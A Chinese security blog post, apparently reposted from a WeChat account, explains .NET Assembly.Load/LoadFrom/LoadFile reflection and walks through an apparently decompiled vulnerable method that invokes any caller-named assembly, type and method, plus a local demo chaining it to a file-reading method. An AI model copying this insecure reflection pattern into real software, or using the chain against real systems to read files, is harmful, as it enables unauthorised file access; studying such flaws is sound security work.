在.net中常用的反射有以下三种
Assembly.Load()Assembly.LoadFrom()Assembly.LoadFile()
网上有关于c#反射的讲解,这里就不班门弄斧了
反射参考文章链接
https://www.cnblogs.com/zagelover/articles/2726034.html
https://blog.csdn.net/cxu123321/article/details/93922298
https://www.cnblogs.com/hopedilei/p/3972384.html
直接说说使用方法吧。
Assembly.Load()一般用来加载同一文件下的其他程序集Assembly assembly = Assembly.Load(“AssemblyName”);
Assembly.LoadFrom()与Assembly.LoadFile()一般用来加载不在同一文件下的其他程序集Assembly assembly = Assembly.LoadFrom(“包含程序集清单的文件的名称或路径”);Assembly assembly = Assembly.LoadFile(“要加载的文件的完全限定路径”);
接下来实际案例演示
漏洞代码/// 利用反射,动态调用方法/// </summary>/// <param name="exefilepath"></param>/// <param name="typeName"></param>/// <param name="methodName"></param>/// <param name="param"></param>/// <returns></returns>// Token: 0x06000026 RID: 38 RVA: 0x00003248 File Offset: 0x00001448[]public string DynamicInvokeMethod(string exefilepath, string typeName, string methodName, string param){string text = this.GetApplicationPath();text = string.Format("{0}\{1}", text, exefilepath);Assembly assembly = Assembly.LoadFrom(text);Type type = assembly.GetType(typeName);MethodInfo method = type.GetMethod(methodName);return method.Invoke(null, new object[]{param}).ToString();}
然后就需要寻找满足条件的方法来进行调用
using System;using System.Data;using System.IO;using System.Text;using xxxx.Framework.Util;namespace xxxx.Framework.Files{// Token: 0x0200000A RID: 10public abstract class FileOperate{// Token: 0x06000035 RID: 53 RVA: 0x00003434 File Offset: 0x00001634public static string ReadFile(string file){string result = "";FileStream fileStream = null;StreamReader streamReader = null;try{fileStream = new FileStream(file, FileMode.Open, FileAccess.Read);streamReader = new StreamReader(fileStream, Encoding.Default);result = streamReader.ReadToEnd();}catch{}finally{if (fileStream != null){fileStream.Flush();fileStream.Close();}if (streamReader != null){streamReader.Close();}}return result;}
这里使用文件读取举例
本地演示
本地代码如下string codeBase = Assembly.GetExecutingAssembly().GetName().CodeBase;string text = Path.GetDirectoryName(codeBase);Console.WriteLine(text);string exefilepath = "xxxx.Framework.dll";if (text.StartsWith("file:")){text = text.Substring(6);}if (text.Substring(text.Length - 1, 1) != "//"){text += "//";}text = string.Format("{0}\{1}", text, exefilepath);//Console.WriteLine(text);Assembly assembly = Assembly.LoadFrom(text);string typeName = "xxxx.Framework.Files.FileOperate";Type type = assembly.GetType(typeName);//Console.WriteLine(type);string methodName = "ReadFile";MethodInfo method = type.GetMethod(methodName);string param = "./z.txt";Console.WriteLine(method.Invoke(null, new object[]{ param }).ToString());
可以看出完全没有问题
原文始发于微信公众号(安全学习与分享):C# Assembly.LoadFrom()反射案列
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论